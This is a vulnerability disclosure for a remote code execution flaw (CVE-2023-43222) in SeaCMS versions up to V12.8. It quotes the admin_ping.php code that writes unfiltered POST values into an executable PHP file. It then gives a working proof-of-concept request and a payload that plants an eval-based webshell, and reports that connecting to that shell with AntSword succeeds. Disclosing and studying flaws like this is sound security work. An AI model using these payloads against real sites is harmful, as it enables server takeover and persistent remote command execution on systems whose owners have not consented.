SeaCMS Background RCE(CVE-2023-43222)

Vulnerability description

   Code audit SeaCMS discovered a remote code execution vulnerability.

   An arbitrary code writing vulnerability exists in the /jxz7g2/admin_ping.php file, causing the attacker's malicious code to be written into the /data/admin/ping.php file, and /data/admin/ping.php can be accessed and executed.(jxz7g2 is the background folder name randomly generated during installation)

Problem type

Remote code execution

Product

Seacms <= V12.8

Version

Seacms <= V12.8

Download address

The latest version download address: GitHub - seacms-net/CMS: 海洋cms程序发布

Detailed process

   The problem code is as follows:

if($action=="set")
{
	$weburl= $_POST['weburl'];
	$token = $_POST['token'];
	$open=fopen("../data/admin/ping.php","w" );
	$str='<?php  ';
	$str.='$weburl = "';
	$str.="$weburl";
	$str.='"; ';
	$str.='$token = "';
	$str.="$token";
	$str.='"; ';
	$str.=" ?>";
	fwrite($open,$str);
	fclose($open);
	ShowMsg("成功保存设置!","admin_ping.php");
	exit;
}

   Found that when action==set, the parameters weburl and token can be passed in through the POST method.These two parameters will be spliced into a piece of php code and written to the data/admin/ping.php file. Without any filtering and checking, attackers can pass in malicious code and eventually write it into the ata/admin/ping.php file.

   The POC is as follows:

POST /seacms/jxz7g2/admin_ping.php?action=set
……
weburl=123";phpinfo();"

   Take a look at the actual verification situation.

   Check the data/admin/ping.php file.

   Found that phpinfo() was successfully written into the data/admin/ping.php file.

   Whether the access verification code can be executed.

   phpinfo() was successfully executed.

Get Shell

   Use the following payload:

weburl=123";@eval($_POST["cmd"]);"

   The webshell is written successfully.

   AntSword connection is successful.